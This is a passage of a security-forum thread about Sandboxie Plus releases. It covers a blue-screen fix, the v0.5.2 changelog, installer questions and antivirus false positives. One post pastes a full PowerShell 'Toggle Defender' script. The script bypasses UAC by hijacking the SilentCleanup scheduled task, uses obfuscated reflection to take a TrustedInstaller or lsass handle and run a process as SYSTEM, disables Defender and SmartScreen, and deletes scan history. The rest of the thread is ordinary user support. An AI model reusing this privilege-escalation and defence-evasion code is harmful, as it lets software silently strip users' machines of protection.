Released Sandboxie Plus (Sbie fork) Versions with Signed Driver

Discussion in 'Sandboxie (SBIE Open Source) Plus & Classic' started by DavidXanatos, Dec 7, 2020.

  1. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    4,027
    Location:
    Mexico
    Same, I wonder why it hasn't been upgraded too.
     
  2. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,171
    Location:
    Viena
    First of all, it may be this issue: https://github.com/sandboxie-plus/Sandboxie/issues/221 which will be fixed in the next release.
    When the BSOD occurs you should get a memory dump; if you post it, I can debug the issue.
    You can use this tool to get the right dmp file: https://www.nirsoft.net/utils/blue_screen_view.html
     
  3. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,171
    Location:
    Viena
    Because that menu is provided by start.exe and not by the main UI component; also, it's simple enough that updating it has no priority.
     
  4. focus

    focus Registered Member

    Joined:
    Feb 5, 2007
    Posts:
    483
    Location:
    USA
    Turn off Windows Defender Core Isolation until David gets it fixed up.
     
  5. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    4,027
    Location:
    Mexico
    I agree.

    Code:
    @(echo off% <#%) &title Toggle Defender, AveYo 2020-11-16          || configure just auto-actions OFF; toggle icon on ltsb
    set "0=%~f0"&set 1=%*&powershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0)) &exit/b ||#>)[1]
    sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'
    if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}
    
    ## Comment to hide dialog prompt with Yes, No, Cancel (6,7,2)
    if ($env:1 -ne 6 -and $env:1 -ne 7) {
      $choice=(new-object -ComObject Wscript.Shell).Popup($A + ' Windows Defender?', 0, 'Defender is: ' + $S, 51)
      if ($choice -eq 2) {break} elseif ($choice -eq 6) {$env:1=$TOGGLE} else {$env:1=$KEEP}
    }
    
    ## Without the dialog prompt above will toggle automatically
    if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }
    
    ## Comment to not relaunch systray icon
    start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1
    
    ## Comment to not hide per-user toggle notifications
    $notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'
    ni $notif -ea 0|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0
    sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}
    
    ## 'UAC is not a security boundary' - OK, Microsoft. But why do you refuse to adress the lamest AlwaysNotify-compatible bpass?
    $ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')
    $bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition
    
    ## Cascade elevation
    $u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3}
    
    ## Reload from volatile registry as needed
    $r=[char]13; $nfo=[char]39+$r+' (\   /)'+$r+'( * . * )  A limited account protects you from UAC exploits'+$r+'    ```'+$r+[char]39
    $script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'
    $script+=';iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$script
    
    ## 0: limited-user: must runas
    if ($u -eq 0) {
      start powershell -args $script -verb runas -win 1; break
    }
    
    ## 1: admin-user non-elevated: try windows built-in lame uac bpass before runas
    if ($u -eq 1) {
      if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; break}
      sp hkcu:\environment windir $('powershell '+$script+' #')
      $z=$bpass.RunEx($null,2,0,$null); $wait=0; while($bpass.State -gt 3 -and $wait -lt 17){sleep -m 100; $wait+=0.1}
      if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0;start powershell -args $script -verb runas -win 1};break
    }
    
    ## 2: admin-user elevated: get ti/system via runasti lean and mean snippet [$window hide:0x0E080600 show:0x0E080610]
    if ($u -eq 2) {
      $A=[AppDomain]::CurrentDomain."Def`ineDynamicAssembly"(1,1)."Def`ineDynamicModule"(1);$D=@();0..5|%{$D+=$A."Def`ineType"('A'+$_,
      1179913,[ValueType])} ;4,5|%{$D+=$D[$_]."Mak`eByRefType"()} ;$I=[Int32];$J="Int`Ptr";$P=$I.module.GetType("System.$J"); $F=@(0)
      $F+=($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$P,$P,$P,$I,$I,$I,$I,$I,$I,$I,$I,[Int16],[Int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I)
      $S=[String]; $9=$D[0]."Def`inePInvokeMethod"('CreateProcess',"kernel`32",8214,1,$I,@($S,$S,$I,$I,$I,$I,$I,$S,$D[6],$D[7]),1,4)
      1..5|%{$k=$_;$n=1;$F[$_]|%{$9=$D[$k]."Def`ineField"('f'+$n++,$_,6)}};$T=@();0..5|%{$T+=$D[$_]."Cr`eateType"();$Z=[uintptr]::size
      nv ('T'+$_)([Activator]::CreateInstance($T[$_]))}; $H=$I.module.GetType("System.Runtime.Interop`Services.Mar`shal");
      $WP=$H."Get`Method"("Write$J",[type[]]($J,$J)); $HG=$H."Get`Method"("AllocH`Global",[type[]]'int32'); $v=$HG.invoke($null,$Z)
      'TrustedInstaller','lsass'|%{if(!$pn){net1 start $_ 2>&1 >$null;$pn=[Diagnostics.Process]::GetProcessesByName($_)[0];}}
      $WP.invoke($null,@($v,$pn.Handle)); $SZ=$H."Get`Method"("SizeOf",[type[]]'type'); $T1.f1=131072; $T1.f2=$Z; $T1.f3=$v; $T2.f1=1
      $T2.f2=1;$T2.f3=1;$T2.f4=1;$T2.f6=$T1;$T3.f1=$SZ.invoke($null,$T[4]);$T4.f1=$T3;$T4.f2=$HG.invoke($null,$SZ.invoke($null,$T[2]))
      $H."Get`Method"("StructureTo`Ptr",[type[]]($D[2],$J,'boolean')).invoke($null,@(($T2-as $D[2]),$T4.f2,$false));$window=0x0E080600
      $9=$T[0]."Get`Method"('CreateProcess').Invoke($null,@($null,$cmd,0,0,0,$window,0,$null,($T4-as $D[4]),($T5-as $D[5]))); break
    }
    
    ## Create registry paths
    $wdp='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    ' Security Center\Notifications','\UX Configuration','\MpEngine','\Spynet','\Real-Time Protection' |% {ni ($wdp+$_)-ea 0|out-null}
    
    ## Toggle Defender
    if ($env:1 -eq 7) {
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
      sc.exe config windefend depend= RpcSs
      net1 start windefend
      kill -Force -Name MpCmdRun -ea 0
      start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-EnableService' -win 1
    } else {
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen 0 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
      net1 stop windefend
      sc.exe config windefend depend= RpcSs-TOGGLE
      kill -Name MpCmdRun -Force -ea 0
      start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-DisableService' -win 1
      del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\mpenginedb.db') -Force -ea 0           ## Commented = keep scan history
      del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\History\Service') -Recurse -Force -ea 0
    }
    
    ## PERSONAL CONFIGURATION TWEAK - COMMENT OR UNCOMMENT #rp ENTRIES TO TWEAK OR REVERT
    sp $wdp DisableRoutinelyTakingAction 1 -Type Dword -Force -ea 0                       ## Auto Actions OFF
    # rp $wdp DisableRoutinelyTakingAction -Force -ea 0                                   ## Auto Actions ON [default]
    sp $wdp PUAProtection 1 -Type Dword -Force -ea 0                                      ## Potential Unwanted Apps ON
    rp $wdp PUAProtection -Force -ea 0                                                    ## Potential Unwanted Apps OFF [default]
    sp ($wdp+'\MpEngine') MpCloudBlockLevel 2 -Type Dword -Force -ea 0                    ## Cloud blocking level HIGH
    rp ($wdp+'\MpEngine') MpCloudBlockLevel -Force -ea 0                                  ## Cloud blocking level LOW [default]
    sp ($wdp+'\Spynet') SpyNetReporting 2 -Type Dword -Force -ea 0                        ## Cloud protection ADVANCED
    rp ($wdp+'\Spynet') SpyNetReporting -Force -ea 0                                      ## Cloud protection BASIC [default]
    sp ($wdp+'\Spynet') SubmitSamplesConsent 0 -Type Dword -Force -ea 0                   ## Sample Submission ALWAYS-PROMPT
    rp ($wdp+'\Spynet') SubmitSamplesConsent -Force -ea 0                                 ## Sample Submission AUTOMATIC [default]
    sp ($wdp+'\Real-Time Protection') RealtimeScanDirection 1 -Type Dword -Force -ea 0    ## Scan incoming file only
    rp ($wdp+'\Real-Time Protection') RealtimeScanDirection -Force -ea 0                  ## Scan incoming and outgoing file [default]
    
    ## Uncomment to close windows built-in lame uac bpass and/or reset uac
    # if ($flaw.Actions.Item(1).Path -ilike '*windir*') {
    #   $flaw.Actions.Item(1).Path=$env:systemroot+'\system32\cleanmgr.exe'               ## %windir%\system32\cleanmgr.exe [default]
    #   $baffling.RegisterTaskDefinition($bpass.Name,$flaw,20,$null,$null,$null)          ## UAC silent bpass mitigation
    #   $uac='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    #   sp $uac EnableLUA 1 -Type Dword -Force -ea 0                                      ## UAC enable
    #   sp $uac ConsentPromptBehaviorAdmin 2 -Type Dword -Force -ea 0                     ## UAC always notify - bpassable otherwise
    #   sp $uac PromptOnSecureDesktop 1 -Type Dword -Force -ea 0                          ## UAC secure - prevent automation
    # }
    
    '@ -Force -ea 0; iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)
    #-_-# hybrid script, can be pasted directly into powershell console
    
    
     
  6. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    14,774
    Location:
    The Netherlands
    OK thanks, when it's fixed I will give Sandboxie Plus a try again. BTW, for the people who prefer the standard GUI, will you keep updating Sandboxie Classic?
     
  7. stapp

    stapp Global Moderator

    Joined:
    Jan 12, 2006
    Posts:
    17,694
    Location:
    UK
  8. Survivor

    Survivor Registered Member

    Joined:
    Jul 11, 2020
    Posts:
    132
    Location:
    Land of Oz
    OK, fair enough, was just coming under my screen. Sure no prio. If MS can do this with a win 10 control panel but many options jumping to the classic, there is no issue for one dev to make this a when it is done prio. :cool: FullAck
     
  9. Vikterola62

    Vikterola62 Registered Member

    Joined:
    Dec 14, 2020
    Posts:
    7
    Location:
    USA
    David they both look great, I would vote for top art! Thanks!
     
  10. Peter 123

    Peter 123 Registered Member

    Joined:
    Feb 1, 2009
    Posts:
    444
    Location:
    Austria
    Sorry for a perhaps quite trivial question:

    What happens when I switch from Windows 10 32-bit to Windows 10 64-bit and therefore I switch from Sandboxie 32-bit to Sandboxie 64-bit too (in my case the classic Sandboxie 5.45)? Will my Sandboxes and their settings be kept?

    I ask because two days ago I made a test upgrade from Windows 32 to Windows 64 bit. When installing Sandboxie 64-bit I remember that this version recognized the old one (= 32 bit) and I think it asked me if I want to keep its settings (just like it happens during a normal update). I always answer with "yes". But after the installation of the 64 bit version all my old sandboxes were gone.
     
  11. AvinashR

    AvinashR Registered Member

    Joined:
    Dec 26, 2009
    Posts:
    2,063
    Location:
    New Delhi Metallo β-Lactamase 1
  12. wissec

    wissec Registered Member

    Joined:
    Apr 11, 2020
    Posts:
    36
    Location:
    Out
    I hope the new update of the classic version will be out soon. With v5.45.0 64-bit, apart from the known bug already mentioned, my Win10 is constantly slowing down. I'm convinced that it's because of SBIE. Thanks so much, David, for continuing to work on this software.
     
  13. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,171
    Location:
    Viena
    That's a bug for the release after next...


    Yes, it should be just fine.

    I will not add any new features to sbiectrl.exe and will not fix any bugs that I don't introduce myself by changing other components, except maybe very minor ones.
    I will provide a classic installer for as long as people use it, but the UI will stay in the state it was in when released by Sophos.
    You can use new Plus features with the Classic build by editing sandboxie.ini by hand, because Plus and Classic share core components.
    For an improved UI experience and support for new features, please upgrade to the Plus build.
     
  14. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,171
    Location:
    Viena
    Also, I have tried what changes when I sign the 32-bit Sbie Classic installer with the EV cert: detections go down from 16 to 12, but still WTF, really WTFF.
    Given that level of screw-up from the anti-malware fools, I tend to really not care and not waste time signing anything but the driver.
     
  15. AvinashR

    AvinashR Registered Member

    Joined:
    Dec 26, 2009
    Posts:
    2,063
    Location:
    New Delhi Metallo β-Lactamase 1
    I think you should sign the installer. It gives a greater confidence to new users who wanted to use it after reading about Sandboxie. You shouldn't give a f**k about detection over VT. It will eventually come down to 0 for sure.
     
  16. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,171
    Location:
    Viena
    This is a maintenance release; it does not bring any major new features but resolves a myriad of various bugs, including a BSOD issue when "Core isolation" was enabled and a major compatibility bug with Windows 10 build 2004 and later.
    It also brings a few minor Plus UI improvements and an entirely new set of icons.


    For Windows 7, unfortunately, the signing process did not return a working driver; a solution is being worked on.
    Therefore, for the time being, please download the "Provisional Windows 7 Drivers.zip" package and provide the driver to the setup when prompted.

    If you have issues with an update installation, just uninstall the previous version, keeping sandboxie.ini, and reinstall the new build.

    Download: https://github.com/sandboxie-plus/Sandboxie/releases/tag/v0.5.2

    Change Log
    Added
    • added advanced new box creation dialog to sandman ui
    • added show/hide tray context menu entry
    • added refresh button to file recovery dialog
    • added mechanism to load icons from {install-dir}/Icons/{icon}.png for UI customization
    • added tray indicator to show disabled forced program status in the sandman ui
    • added program name suggestions to box options in sandman ui
    • added saving of column sizes in the options window
    Changed
    • reorganized the advanced box options a bit
    • changed icons (thanks Valinwolf for picking the new ones)
    • updated Template.ini (thanks isaak654)
    • increased max value for disable forced process time in sandman ui
    Fixed
    • fixed BSOD introduced in 5.45.0 when using windows 10 "Core isolation"
    • fixed minor issue with lingering/leader processes
    • fixed menu issue in sandman ui
    • fixed issue with stop behaviour page in sandman ui
    • fixed issue with Plus installer not displaying kmdutil window
    • fixed sandman UI saving ui settings on windows shutdown
    • fixed issue with Plus installer autorun
    • fixed issue with legacy installer not removing all files
    • fixed a driver compatibility issue with windows 20H1 and later
      -- this solves "stop pending", line messenger hanging and other issues...
    • fixed quick recovery issue in SbieCtrl.exe introduced in 5.45.0
    • fixed issue with advanced hide process settings not saving
    • fixed some typos in the UI (thanks isaak654)
    • fixed issue with GetRawInputDeviceInfo failing when boxed processes are put in a job object
      -- this fix resolves issues with CP2077 and other PC games not getting keyboard input (thanks Rostok)
    • fixed failing ClipCursor no longer spams the message log
    • fixed issue with adding recovery folders in sandman ui
    • fixed issue with office 2019 template when using a non-default sbie install location
    • fixed issue setting last access attribute on sandboxed folders
    • fixed issue with process start signal
     
  17. davi

    davi Registered Member

    Joined:
    Jul 3, 2020
    Posts:
    19
    Location:
    RO
    Hello,

    Just installed the 0.5.2 release, and it seems that from the new Sandboxie UI I get an error when trying to launch Explorer; I tried the old GUI and with that it works to launch an Explorer instance.
    The error that I get is:
    upload_2020-12-23_15-7-43.png
     
  18. stapp

    stapp Global Moderator

    Joined:
    Jan 12, 2006
    Posts:
    17,694
    Location:
    UK
    Did a clean install of 0.5.2 above.
    Download and install was painless. Defender wasn't interested in it.

    Stop behaviour is fixed. When Vivaldi is closed... Sbie Plus closes straight away.
    I can recover a file from the Downloads folder now, so you have fixed the File Recovery options.
    However, I do not have immediate recovery selected, but it is recovering the files as soon as the download is finished.
    How do I get Plus to only recover the file when the browser is closed? Will it give me the option to keep it like Legacy did?

    When I close the sbie'd browser and afterwards open the SandMan from the desktop icon or taskbar icon, the size is still minimized even though I closed it as maximised the last time it was opened.

    Good work @DavidXanatos
     
  19. Peter 123

    Peter 123 Registered Member

    Joined:
    Feb 1, 2009
    Posts:
    444
    Location:
    Austria
    Thanks for your reply, David. That means that obviously I made some mistake when installing the 64-bit version of Sandboxie.

    So my additional question:
    In order to correct the situation: is it sufficient (especially with regard to security) if I now replace the .ini file of the 64-bit version with the .ini file of the 32-bit version?
     
  20. Harper

    Harper Registered Member

    Joined:
    Dec 12, 2020
    Posts:
    15
    Location:
    Nowhere
    Hello

    Have you tried installing CheatEngine on Sbie-plus before? My attempt failed.
     
  21. henryg1

    henryg1 Registered Member

    Joined:
    Jun 14, 2020
    Posts:
    201
    Location:
    uk
    upload_2020-12-23_15-4-21.png
    Sbie Control was not running, so I thought would need to uninstall first as usual. But on rebooting and without uninstalling first, the new version had been installed.

    EDIT - this was Classic not Plus
     
    Last edited: Dec 23, 2020
  22. henryg1

    henryg1 Registered Member

    Joined:
    Jun 14, 2020
    Posts:
    201
    Location:
    uk
    I thought I should give Plus a proper try again as it looks to be the future, given David's comment above. So I uninstalled Classic and then installed Plus, which picked up my sandboxie.ini file & settings with no problems I can see yet.

    A couple of initial questions:
    1. The colours of the icons for each sandbox in the SandMan Control window differ from those I have set for each individual sandbox's window border, which I find confusing

    upload_2020-12-23_16-45-51.png

    and is there any way I can make them the same?

    2. Sticky Password now seems to work, but only if dropped rights are disabled. This wasn't a problem in times past; is there any way of circumventing this? I suspect not.
     
  23. focus

    focus Registered Member

    Joined:
    Feb 5, 2007
    Posts:
    483
    Location:
    USA
    Nice, thank you. Merry Christmas!
     
  24. Rainwalker

    Rainwalker Registered Member

    Joined:
    May 18, 2003
    Posts:
    2,612
    Location:
    USA
    I am running 0.5.1. How do I do an uninstall so I can upgrade to 0.5.2, and if I do an uninstall, how do I keep the settings I now have in .1? o_O
     
    Last edited: Dec 23, 2020
  25. Monica2000

    Monica2000 Registered Member

    Joined:
    May 18, 2020
    Posts:
    59
    Location:
    Spain
    I'm using Firefox and I can't download Sandboxie-Plus-x64-v0.5.2 because of viruses.

    I can download SandboxieInstall64-v5.45.1.exe, but it is not clean at all according to VT because the file is not signed!
     